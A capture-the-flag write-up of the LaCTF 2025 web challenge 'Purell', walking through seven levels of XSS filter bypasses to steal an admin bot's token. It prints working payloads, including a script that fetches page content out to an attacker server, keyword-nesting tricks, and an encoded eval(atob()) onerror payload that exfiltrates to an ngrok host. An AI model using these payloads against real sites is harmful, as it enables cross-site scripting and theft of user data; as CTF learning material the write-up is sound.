
๐ŸŒ Purell

A detailed write-up of the Web challenge 'Purell' from LaCTF - 2025

Challenge Presentation

๐Ÿ“Š Challenge Overview

Category Details Additional Info
๐Ÿ† Event LaCTF - 2025 Event Link
๐Ÿ”ฐ Category Web ๐ŸŒ
๐Ÿ’Ž Points 500 Out of 500 total
โญ Difficulty ๐ŸŸก Medium Personal Rating: 5/10
๐Ÿ‘ค Author r2uwu2, adapted by burturt for la ctf Profile
๐ŸŽฎ Solves (At the time of flag submission) 27 solve rate
๐Ÿ“… Date 08-02-2025 LaCTF - 2025
๐Ÿฆพ Solved By mH4ck3r0n3 Team: QnQSec

๐Ÿ“ Challenge Information

Here in purellland, we sanitize your inputs. We kill 99% of germs, can you be the 1% germ that slips through? Note: when giving links to the admin bot, the link must be exactly of the form

๐ŸŽฏ Challenge Files & Infrastructure

Provided Files


๐Ÿ” Initial Analysis

First Steps

Initially, the website appears as follows:

Site Presentation

By clicking the link at Level 0, I was redirected to the following page:

Level 0

From this and the fact that there was an admin bot to which an URL could be reported, I understood it was an XSS challenge. I didnโ€™t read much of the attached files since they contained almost the same information as the website. There were a total of 7 levels, and with each level, an additional layer of sanitization was applied to the input of the textArea. The first thing I noticed was that the goal wasnโ€™t to steal the admin bot’s cookies when it was directed to the page with the XSS. Instead, the goal was to steal a token contained within the page visited by the admin bot, as we can see from level zero: purell-token{xss_guru_0}. So, the first thing I did was start an ngrok server:

 ngrok 8080

to which the stolen token from the admin bot’s requests would be sent. The first level had no sanitization, so I used a simple XSS payload:

<script>fetch('' + document.querySelector('.flag').innerText)</script>

Once the payload was sent into the textArea, I extracted the generated page link:

Level 0 Payload


Containing the payload. As we can already see from ngrok, the first request has arrived:

Ngrok Level 0 Fake Token

but as we can see, itโ€™s the fake token; we need the admin’s token. So, I took the previously generated payload link and reported it to the admin bot:

Level 0 Admin Report

Having done this, I checked the ngrok web interface again to see the result of the request and retrieve the admin’s valid token:

Ngrok Level 0 Admin Token

As we can see, the injection worked, and I successfully extracted the first valid token (purell-token{gu4u_of_exf1l}) to proceed to the next level. By submitting it:

Level 0 Token Send

I was able to retrieve the first part of the flag (lactf{1_4m_z3_), and I gained access to level 1:

Flag First Part

The process continues in the same way, so let’s move on to the exploitation.

๐Ÿ”ฌ Vulnerability Analysis

Potential Vulnerabilities

  • XSS (Cross-Site Scripting)

๐ŸŽฏ Solution Path

Exploitation Steps

Initial setup

Having understood the vulnerability, I proceeded with the exploitation phase. Now, itโ€™s just a matter of figuring out how to bypass the additional sanitization in the new levels.


The new level presents sanitization:

Level 1

As we can see, the sanitizer: html => html.includes('script') || html.length > 150 ? 'nuh-uh' : html, applies sanitization to the input, where anything containing the word script or a payload longer than 150 characters will result in the injection failing. I found a website to count the characters and check if the payload exceeded 150 characters (Character Counter). Once I confirmed the payload was under 150 characters, I needed to figure out how to bypass the first sanitizer (html.includes('script')):

Char Counter

Since the check was done on script in all lowercase, I thought of modifying the payload by inserting ScrIPt instead of script:


This payload allowed me to successfully achieve the injection and bypass level 1 (the process remains the same for all levels: injection -> link -> report -> token -> token submission), so I wonโ€™t repeat it every time in the write-up. As we can see, I obtained the new token:

Ngrok Level 1

I wonโ€™t show all the tokens sent anymore, but Iโ€™ll only include the procedure to bypass the sanitization of the payloads. By submitting the token (purell-token{scr7ptl355_m3n4c3}), I received the second part of the flag: b3s7_x40ss_. Accessing level 2, a new layer of sanitization was introduced:

Sanitizer:ย (html) => html.includes('script') || html.includes('on') || html.length > 150 ? 'nuh-uh' : html

Now, it also checks if on is present in the payload, and the injection is sanitized. However, with the previous payload, I was able to bypass this level as well, accessing level 3 and obtaining the third part of the flag: h4nd_g34m_, along with the token (purell-token{XSS_IS_UNSTOPPABLE_RAHHHH}). Level 3 introduced another layer of sanitization:

Sanitizer:ย (html) => html.toLowerCase().replaceAll('script', '').replaceAll('on', '')

In this case, the control is applied to a string in all lowercase, so the previous payload cannot work because it contains uppercase characters and, most importantly, it contains script. In fact, as we can see, it replaces script and on, removing them from the payload being inserted. Here, I started to encounter a couple of issues, because previously I was using document.querySelector('.flag').innerText) to extract the token from the HTML page and send it to my web server, but now I can no longer use it because of toLowerCase(). In fact, the queryselector() or innertext functions do not exist, so it is impossible to extract the flag in this way. I then thought of starting a local server with Python and hosting an exploit file using Python’s http.server + ngrok forwarding:

python -m http.server 8080

The exploit file is as follows:  Exploit. By doing this, I inserted a script in the page with a src pointing to my web server, where I was serving the exploit. This exploit makes a request to my web server exactly as I did with the previous payloads. Why is this? To bypass the toLowerCase(), in fact, since the js file was served by me from my web server and the page pointed to it, it didn’t pass through the sanitizer, and therefore I could use any character. I then used the following payload:

<scriscriptpt src="//"></scriscriptpt>

I used <scriscriptpt> because once the sanitizer does the replace, it replaces script with *nothing*, and we end up with <script>, successfully performing the injection. Once the injection was sent, I extracted the token (purell-token{a_l7l_b7t_0f_m00t4t70n}) to access the new part of the flag (4cr0ss_411_t1m3) and level 4. Here, another type of sanitization is applied:

(html) => html .toLowerCase().replaceAll('script', '').replaceAll('on', '') .replaceAll('>', '')

The replacement of > (a character that, as we know, is used to close HTML tags) is introduced here. When trying to insert <scriscriptpt>, the tag remained open, which prevented the execution of the JavaScript code contained within it. After a couple of tries, I was able to trigger the alert and successfully perform the injection with the following payload:

<img src=x oonnerror="alert(1)"

Exploiting the same technique used earlier, which replaces on to make the input onerror. However, now problems start arising since without the <script> tag, I can no longer bypass the toLowerCase() with a script hosted on my web server, as it’s not possible to include JS within an HTML image tag. After several attempts, I found a somewhat unusual but effective solution. I used eval() to execute the JavaScript, the atob() function to decode the base64 payload, and finally encoded the payload from base64 to hex to bypass the toLowerCase() control. I took the previously used payload and made these conversions with CyberChef:

Cyberchef Encoding->Base64->Hex

And I built the following payload:

<img src=x oonnerror="eval(atob('\x5a\x6d\x56\x30\x59\x32\x67\x6f\x4a\x32\x68\x30\x64\x48\x42\x7a\x4f\x69\x38\x76\x59\x7a\x42\x69\x4e\x43\x30\x79\x4c\x54\x4d\x33\x4c\x54\x45\x32\x4e\x79\x30\x78\x4d\x44\x67\x75\x62\x6d\x64\x79\x62\x32\x73\x74\x5a\x6e\x4a\x6c\x5a\x53\x35\x68\x63\x48\x41\x2f\x5a\x6d\x78\x68\x5a\x7a\x30\x6e\x49\x43\x73\x67\x5a\x47\x39\x6a\x64\x57\x31\x6c\x62\x6e\x51\x75\x63\x58\x56\x6c\x63\x6e\x6c\x54\x5a\x57\x78\x6c\x59\x33\x52\x76\x63\x69\x67\x6e\x4c\x6d\x5a\x73\x59\x57\x63\x6e\x4b\x53\x35\x70\x62\x6d\x35\x6c\x63\x6c\x52\x6c\x65\x48\x51\x70'))">

By doing this, the hex text became ascii, which was encoded in base64. The atob() function decodes the base64, and finally, everything is executed by eval(). This allowed me to obtain the new token (purell-token{html_7s_m4lf0rmed_bu7_no7_u}) for level 5 and the new part of the flag (_4nd_z_). Upon accessing the new level, another sanitization is introduced:

(html) => html .toLowerCase().replaceAll('script', '').replaceAll('on', '') .replaceAll('>', '') .replace(/\s/g, '')

A space replacement is added within the payload. After a few tests, I discovered that HTML interprets the / character as a space, so I replaced the / character in the previous payload instead of spaces and successfully got the injection (since the encoding process already eliminated all spaces).


By sending it, I retrieved the new token (purell-token{wh3n_th3_imp0st4_i5_5u5_bu7_th3r35_n0_sp4c3}) for access to level 6 and the new part of the flag (un1v3rs3). We have finally reached the last level, where an additional layer of sanitization is introduced:

(html) => html .toLowerCase().replaceAll('script', '').replaceAll('on', '') .replaceAll('>', '') .replace(/\s/g, '') .replace(/[()]/g, '')

All parentheses (()) are therefore removed. To call the eval and atob functions, parentheses are essential, so I started trying a few things and thought of using some sort of encoding. I then came up with the idea of encoding the parentheses into HTML Entity using CyberChef:

Cyberchef Encoding->HTML Entity

As we can see, they are replaced with &lpar;&rpar;. By replacing them in the previous payload and sending it, I obtained the injection:


(For these last levels, I have to thank the authors of the challenge for removing the control on the maximum 150 characters, otherwise I think it would have been impossible.) I retrieved the token (purell-token{y0u_4r3_th3_0n3_wh0_c4ll5}) and sending it, I obtained the final part of the flag (_1nf3c71ng_3v34y_1}). Now all that’s left is to put it together completely and we’re done!

Flag capture

Manual Flag

๐Ÿ› ๏ธ Exploitation Process


Since there was a reCAPTCHA, I couldn’t create a fully automated exploit, but the exploit is based on a local server written in Python that takes requests made through the injection, extracts the token, and sends it to the /flag endpoint. Once done, it uses a regex to retrieve the flag part and concatenate it. At the end, when all requests are made, you just press CTRL+C to print the full flag. Of course, this requires setting it with the ngrok URL. The alternative would be to run, always setting the ngrok URL to redirect the tokens directly to the local server, which will carry out the entire process described above.

๐Ÿšฉ Flag Capture


Proof of Execution

Automated Flag
Screenshot of successful exploitation

๐Ÿ”ง Tools Used

Tool Purpose
Python Exploit
CyberChef Encoding
Character Counter Character Count

๐Ÿ’ก Key Learnings

New Knowledge

I have learned new techniques to bypass some filters imposed on XSS.

Skills Improved

  • Binary Exploitation
  • Reverse Engineering
  • Web Exploitation
  • Cryptography
  • Forensics
  • Miscellaneous

๐Ÿ“š References & Resources

Learning Resources

๐Ÿ“Š Final Statistics

Metric Value Notes
Time to Solve 01:30 From start to flag
Global Ranking (At the time of flag submission) 30/714 Challenge ranking
Points Earned 500 Team contribution

Created: 08-02-2025 โ€ข Last Modified: 08-02-2025 Author: mH4ck3r0n3 โ€ข Team: QnQSec